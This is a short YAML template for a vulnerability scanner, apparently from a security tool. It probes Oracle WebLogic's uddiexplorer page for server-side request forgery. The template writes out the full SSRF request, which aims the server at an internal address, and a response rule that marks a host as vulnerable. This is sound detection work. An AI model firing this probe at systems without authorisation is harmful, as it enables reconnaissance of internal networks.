id: oracle-weblogic-ssrf
info:
  name: Oracle Weblogic SSRF
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    url: >-
      {{.root}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700
    headers:
      - Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|;
    redirect: false
    detections: 
      - >-
        StatusCode() == 200 && StringSearch("response","Socket Closed")

reference:
  - link: https://www.exploit-db.com/exploits/40130